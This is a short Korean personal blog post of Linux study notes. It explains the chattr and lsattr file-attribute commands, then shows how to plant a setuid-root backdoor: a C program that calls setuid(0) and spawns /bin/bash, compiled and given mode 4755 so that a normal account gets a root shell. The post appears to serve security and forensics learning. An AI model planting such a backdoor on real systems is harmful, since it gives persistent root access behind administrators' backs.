kkamagi's story

IT, 정보보안, 포렌식, 일상 공유

OS

파일 속성 변경 (chattr 과 lsattr.pdf)

까마기 2015. 2. 5. 20:52
728x90
반응형
파일 속성 변경 chattr 과 lsattr.pdf


 chattr +-= [ASacdisu] filename 또는 directory
+ : 지정한 옵션을 추가한다는 의미
- : 지정한 옵션을 삭제한다는 의미
= : 지정된 옵션을 초기화하여 설정한다는 의미
A : 파일에 대한 atime 즉 접근시간(Access time) 속성을 변경할 수 있다.
a : append(추가)만이 가능하다.
i : 가장 많이 사용되는 것으로 immutable의 으미로 파일의 추가, 변경, 삭제 등이 불가능하다. 




해킹 당했을 시 일반 명령어 있는곳을 속성 검사를 해야한다.





# chattr -i file1
# rm file1
rm: remove 일반 빈 파일 `file1'? y
#

================
lsmp
Linux System Management Program


==============
shell 스크립트로 root 권한 가져오기

root 계정에서 
일단 일반계정을 하나 만든다.

그리고 다음과 같이 소스코드를 만든다.

# cat backdoor.c
#include <stdio.h>

main ()

{
        setuid(0);
        setgid(0);
        system("/bin/bash");
}
#

컴파일을 한다.

# gcc -o back backdoor.c


현재 back 의 권한은 

-rwxr-xr-x   1 root root     4934  5월  2 17:36 back



이것을  setuid 권한을 준다.
# chmod 4755 back
# ls -al
합계 33536
drwxr-xr-x   3 root root     4096  5월  2 17:36 .
drwxr-xr-x  32 root root     4096  5월  2 17:05 ..
lrwxrwxrwx   1 root root        8  5월  1 16:28 1.txt -> test.txt
-rw-r--r--   1 root root   512000  5월  1 17:41 2.txt
-rw-r--r--   1 root root 31457280  5월  1 17:42 30M.dd
-rwsr-xr-x   1 root root     4934  5월  2 17:36 back

그래야 일반 계정으로 접속했을 때 root의 권한으로 만들어진 back 파일을 root의 권한을 가져와 실행함으로써

그 파일 안의 내용인 setuid(0), setgid(0)를 가져옴으로써 루트 권한을 가져온다.

일반계정에서

# ./back
# id
로 확인
 


반응형